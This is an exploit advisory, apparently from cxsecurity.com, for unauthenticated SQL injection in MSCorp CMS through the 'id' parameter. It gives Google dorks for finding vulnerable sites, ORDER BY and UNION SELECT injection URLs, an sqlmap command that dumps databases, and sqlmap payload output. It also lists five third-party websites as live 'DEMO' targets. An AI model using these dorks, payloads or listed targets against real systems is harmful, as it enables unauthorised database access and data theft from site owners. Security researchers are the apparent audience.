MSCorp CMS - SQL Injection Vulnerability

2015.08.08
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

========================================================= [+] Title :- MSCorp CMS - SQL Injection Vulnerability [+] Date :- 7 - Aug - 2015 [+] Vendor Homepage :- http://www.mscorp.co.in/ [+] Version :- All Versions [+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows [+] Category :- webapps [+] Google Dorks :- "Developed By MSCorp" "Developed By MSCorp" +inurl:/.php?id= "Developed By MSCorp" inurl:"php?" [+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN) [+] Team name :- Team Alastor Breeze, Intelligent-Exploit [+] Official Website :- serverfarming.com, intelligentexploit.com [+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k [+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK [+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php [+] POC :- http://127.0.0.1/XXX.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://www.[WEBSITE].com/XXX.php?id=6' order by [SQL IN4JECTION]--+ http://www.[WEBSITE].com/XXX.php?id=6' union all select [SQL INJECTION]--+ SQLMap ++++++++++++++++++++++++++ python sqlmap.py --url "http://127.0.0.1/XXX.php?id=[SQL]" --dbs ++++++++++++++++++++++++++ --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 1803=1803 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=6 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id=6 UNION ALL SELECT CONCAT(0x717a626a71,0x72454556666e64596a4a,0x7178767071)-- --- [+] DEMO :- http://www.hoXtelsahyadrialibaug.com/gallery.php?id=6' http://www.tapolaXtourism.com/showContent.php?id=17' http://www.reigeXltech.com/content.php?content=10' http://www.koyXanalakeview.com/facilities.php?content=4' http://www.lycXomb.com/productdetails.php?id=2' =======================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top